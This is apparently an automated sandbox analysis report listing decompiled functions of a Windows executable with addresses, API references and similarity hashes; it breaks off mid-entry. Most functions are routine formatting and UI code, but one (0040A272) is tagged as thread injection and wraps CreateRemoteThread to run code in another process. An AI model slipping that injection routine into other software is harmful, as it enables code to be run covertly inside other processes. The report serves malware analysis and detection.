                                                                                                                    • API ID: ??3@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 613200358-0
                                                                                                                    • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                    • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                    • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                    • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                                    0x00407362
                                                                                                                    0x00407369
                                                                                                                    0x0040736e
                                                                                                                    0x00407371
                                                                                                                    0x00407378
                                                                                                                    0x0040737e
                                                                                                                    0x00407381
                                                                                                                    0x00407386
                                                                                                                    0x0040739f
                                                                                                                    0x00407388
                                                                                                                    0x00407391
                                                                                                                    0x00407391
                                                                                                                    0x004073a4
                                                                                                                    0x004073ac
                                                                                                                    0x004073ad
                                                                                                                    0x004073cd
                                                                                                                    0x004073d0
                                                                                                                    0x004073d3
                                                                                                                    0x004073d6
                                                                                                                    0x004073e0
                                                                                                                    0x004073e7
                                                                                                                    0x004073ee
                                                                                                                    0x004073f5
                                                                                                                    0x0040741a
                                                                                                                    0x0040741a
                                                                                                                    0x0040741d
                                                                                                                    0x00407420
                                                                                                                    0x00407423
                                                                                                                    0x00407426
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004073fc
                                                                                                                    0x00407400
                                                                                                                    0x0040740f
                                                                                                                    0x00407412
                                                                                                                    0x00407412
                                                                                                                    0x00407402
                                                                                                                    0x00407402
                                                                                                                    0x00407407
                                                                                                                    0x00407407
                                                                                                                    0x00407413
                                                                                                                    0x00407419
                                                                                                                    0x00407419
                                                                                                                    0x00407419
                                                                                                                    0x0040742f
                                                                                                                    0x00407434
                                                                                                                    0x00407437
                                                                                                                    0x00407439
                                                                                                                    0x0040743b
                                                                                                                    0x0040743b
                                                                                                                    0x0040744e
                                                                                                                    0x00407453
                                                                                                                    0x00407453
                                                                                                                    0x004073af
                                                                                                                    0x004073b2
                                                                                                                    0x004073ba
                                                                                                                    0x004073bb
                                                                                                                    0x00000000
                                                                                                                    0x004073bd
                                                                                                                    0x004073c3
                                                                                                                    0x004073c3
                                                                                                                    0x004073bb
                                                                                                                    0x0040745c
                                                                                                                    0x00407468
                                                                                                                    0x00407468
                                                                                                                    0x0040746d
                                                                                                                    0x00407473
                                                                                                                    0x0040747c
                                                                                                                    0x0040748e

                                                                                                                    APIs
                                                                                                                    • wcschr.MSVCRT ref: 004073A4
                                                                                                                    • wcschr.MSVCRT ref: 004073B2
                                                                                                                      • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                      • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                    • String ID: "
                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                    • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                    • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                    • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                    • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                    0x0040a27d
                                                                                                                    0x0040a286
                                                                                                                    0x0040a290
                                                                                                                    0x0040a29d
                                                                                                                    0x00000000
                                                                                                                    0x0040a32f
                                                                                                                    0x0040a29f
                                                                                                                    0x0040a2a4
                                                                                                                    0x0040a2ad
                                                                                                                    0x0040a2b6
                                                                                                                    0x0040a2bc
                                                                                                                    0x0040a2be
                                                                                                                    0x0040a2c4
                                                                                                                    0x0040a2c8
                                                                                                                    0x0040a2ce
                                                                                                                    0x0040a2e3
                                                                                                                    0x0040a2ed
                                                                                                                    0x0040a2fb
                                                                                                                    0x0040a2fe
                                                                                                                    0x0040a305
                                                                                                                    0x0040a30c
                                                                                                                    0x0040a30f
                                                                                                                    0x0040a313
                                                                                                                    0x00000000
                                                                                                                    0x0040a31a
                                                                                                                    0x0040a338

                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?,751468A0,00000000), ref: 0040A290
                                                                                                                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                      • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                      • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 283512611-3993045852
                                                                                                                    • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                    • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                    • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                    • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 45%
                                                                                                                    			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                    0x00401676
                                                                                                                    0x0040167e
                                                                                                                    0x0040168a
                                                                                                                    0x0040168c
                                                                                                                    0x00401690
                                                                                                                    0x00401691
                                                                                                                    0x00401696
                                                                                                                    0x0040169d
                                                                                                                    0x004016a2
                                                                                                                    0x004016aa
                                                                                                                    0x004016aa
                                                                                                                    0x004016aa
                                                                                                                    0x004016ad
                                                                                                                    0x004016ae
                                                                                                                    0x004016b3
                                                                                                                    0x004016b9
                                                                                                                    0x004016bb
                                                                                                                    0x004016bc
                                                                                                                    0x004016c1
                                                                                                                    0x004016c8
                                                                                                                    0x004016cd
                                                                                                                    0x004016ce
                                                                                                                    0x004016ea
                                                                                                                    0x004016ff
                                                                                                                    0x0040170c
                                                                                                                    0x004016d0
                                                                                                                    0x004016e3
                                                                                                                    0x004016e3
                                                                                                                    0x00401711
                                                                                                                    0x00401714
                                                                                                                    0x00000000
                                                                                                                    0x00401719
                                                                                                                    0x0040171c

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf
                                                                                                                    • String ID: Line%d$Lines
                                                                                                                    • API String ID: 3988819677-2790224864
                                                                                                                    • Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                    • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                    • Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                    • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 70%
                                                                                                                    			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                    0x00405132
                                                                                                                    0x00405135
                                                                                                                    0x00405139
                                                                                                                    0x0040513e
                                                                                                                    0x00405141
                                                                                                                    0x004051b3
                                                                                                                    0x00405143
                                                                                                                    0x00405145
                                                                                                                    0x00405147
                                                                                                                    0x0040514c
                                                                                                                    0x0040514e
                                                                                                                    0x00405151
                                                                                                                    0x00405151
                                                                                                                    0x0040515b
                                                                                                                    0x0040515c
                                                                                                                    0x0040515d
                                                                                                                    0x0040515e
                                                                                                                    0x0040515f
                                                                                                                    0x00405168
                                                                                                                    0x00405169
                                                                                                                    0x00405171
                                                                                                                    0x00405173
                                                                                                                    0x00405174
                                                                                                                    0x00405182
                                                                                                                    0x00405184
                                                                                                                    0x00405189
                                                                                                                    0x0040518c
                                                                                                                    0x00405194
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405196
                                                                                                                    0x0040519a
                                                                                                                    0x0040519b
                                                                                                                    0x004051a1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004051a1
                                                                                                                    0x004051a3
                                                                                                                    0x004051a3
                                                                                                                    0x004051a6
                                                                                                                    0x004051af
                                                                                                                    0x004051b0
                                                                                                                    0x004051b7

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                    • String ID: %2.2X
                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                    • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                    • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                    • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                    • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 43%
                                                                                                                    			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                                    0x004075bb
                                                                                                                    0x004075c2
                                                                                                                    0x004075c7
                                                                                                                    0x004075ca
                                                                                                                    0x004075cd
                                                                                                                    0x004075d8
                                                                                                                    0x004075e9
                                                                                                                    0x004075fc
                                                                                                                    0x00407600
                                                                                                                    0x00407601
                                                                                                                    0x00407606
                                                                                                                    0x00407609
                                                                                                                    0x0040760e
                                                                                                                    0x00407619
                                                                                                                    0x0040761e
                                                                                                                    0x0040761f
                                                                                                                    0x00407624
                                                                                                                    0x00407636

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf
                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                                    • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                    • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                    • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                    • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                    0x00405080
                                                                                                                    0x00405086
                                                                                                                    0x0040508b
                                                                                                                    0x0040508e
                                                                                                                    0x00405091
                                                                                                                    0x00405097
                                                                                                                    0x0040509d
                                                                                                                    0x004050a4
                                                                                                                    0x004050ab
                                                                                                                    0x004050b2
                                                                                                                    0x004050b5
                                                                                                                    0x004050bc
                                                                                                                    0x004050cb
                                                                                                                    0x004050e0
                                                                                                                    0x004050cd
                                                                                                                    0x004050d1
                                                                                                                    0x004050dc
                                                                                                                    0x004050dc

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileNameOpenwcscpy
                                                                                                                    • String ID: L
                                                                                                                    • API String ID: 3246554996-2909332022
                                                                                                                    • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                    • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                    • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                    • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                    0x00409072
                                                                                                                    0x00409074
                                                                                                                    0x0040907d
                                                                                                                    0x00409086
                                                                                                                    0x0040908e
                                                                                                                    0x004090a5
                                                                                                                    0x004090a5
                                                                                                                    0x0040908e
                                                                                                                    0x004090ac

                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID: LookupAccountSidW$Y@
                                                                                                                    • API String ID: 190572456-2352570548
                                                                                                                    • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                    • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                    • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                    • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 37%
                                                                                                                    			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                                    0x0040ad8c
                                                                                                                    0x0040ad93
                                                                                                                    0x0040ad95
                                                                                                                    0x0040ad9d
                                                                                                                    0x0040ada5
                                                                                                                    0x0040adb2
                                                                                                                    0x0040adb2
                                                                                                                    0x0040adb5
                                                                                                                    0x0040adbf

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                    • String ID: shlwapi.dll
                                                                                                                    • API String ID: 4092907564-3792422438
                                                                                                                    • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
